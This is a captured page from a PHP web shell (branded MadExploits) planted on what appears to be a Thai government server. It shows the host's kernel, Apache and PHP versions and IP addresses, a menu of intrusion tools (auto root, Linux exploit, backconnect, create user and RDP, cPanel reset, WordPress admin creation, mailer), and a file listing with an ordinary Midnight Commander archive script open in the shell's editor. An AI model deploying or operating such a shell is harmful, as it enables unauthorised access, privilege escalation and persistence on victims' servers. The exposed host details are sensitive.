Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
mc /
extfs /
[ HOME SHELL ]
Name
Size
Permission
Action
README
7.28
KB
-rw-r--r--
a
3.13
KB
-rwxr-xr-x
apt
9.5
KB
-rwxr-xr-x
audio
1.29
KB
-rwxr-xr-x
bpp
1.18
KB
-rwxr-xr-x
deb
5.32
KB
-rwxr-xr-x
deba
3
KB
-rwxr-xr-x
debd
10.25
KB
-rwxr-xr-x
dpkg
8.79
KB
-rwxr-xr-x
hp48
2.57
KB
-rwxr-xr-x
iso9660
2.16
KB
-rwxr-xr-x
lslR
1.05
KB
-rwxr-xr-x
mailfs
5.35
KB
-rwxr-xr-x
patchfs
9.99
KB
-rwxr-xr-x
rpm
10.37
KB
-rwxr-xr-x
rpms
1.47
KB
-rwxr-xr-x
s3
10.23
KB
-rwxr-xr-x
trpm
7.65
KB
-rwxr-xr-x
u7z
2.26
KB
-rwxr-xr-x
uace
1.13
KB
-rwxr-xr-x
ualz
1.25
KB
-rwxr-xr-x
uar
1.29
KB
-rwxr-xr-x
uarc
1.49
KB
-rwxr-xr-x
uarj
1.62
KB
-rwxr-xr-x
uc1541
1.57
KB
-rwxr-xr-x
ucab
734
B
-rwxr-xr-x
uha
969
B
-rwxr-xr-x
ulha
3.78
KB
-rwxr-xr-x
urar
2.53
KB
-rwxr-xr-x
uzip
14.33
KB
-rwxr-xr-x
uzoo
1.39
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : uar
#!/bin/sh # # Written by Alex Kuchma <ask@bcs.zp.ua> # Alex Tkachenko <alex@bcs.zp.ua> # Updated by Vitezslav Samel <xsamel00@dcse.fee.vutbr.cz> # # (C) 1997, 1998 The Free Software Foundation. # # XAR=ar mcarfs_list () { # If $temp_replace string is part of the filename that part might get lost temp_replace='Unique Separator String' thisyear="`date +%Y`" $XAR tv "$1" | sed 's,^,-,;s, , 1 ,;s,/, ,' | sed -e "s/\( [0-2][0-9]\:[0-5][0-9]\)\( $thisyear \)\(.*\)/\1$temp_replace\3/" | sed -e "s/\( [0-2][0-9]\:[0-5][0-9] \)\([12][0-9][0-9][0-9] \)\(.*\)/ \2\3/" | sed -e "s/$temp_replace/ /" } mcarfs_copyout () { $XAR p "$1" "$2" > "$3" } mcarfs_copyin () { TMPDIR=`mktemp -d "${MC_TMPDIR:-/tmp}/mctmpdir-uar.XXXXXX"` || exit 1 name=`basename "$2"` (cd "$TMPDIR" && cp -fp "$3" "$name" && $XAR r "$1" "$name") rm -rf "$TMPDIR" } mcarfs_rm () { $XAR d "$1" "$2" } # override any locale for dates LC_ALL=C export LC_ALL umask 077 case "$1" in list) mcarfs_list "$2" ;; copyout) shift; mcarfs_copyout "$@" ;; copyin) shift; mcarfs_copyin "$@" ;; rm) shift; mcarfs_rm "$@" ;; mkdir|rmdir) echo "mcarfs: ar archives cannot contain directories." 1>&2 exit 1;; *) echo "mcarfs: unknown command: \"$1\"." 1>&2 exit 1;; esac exit 0
Close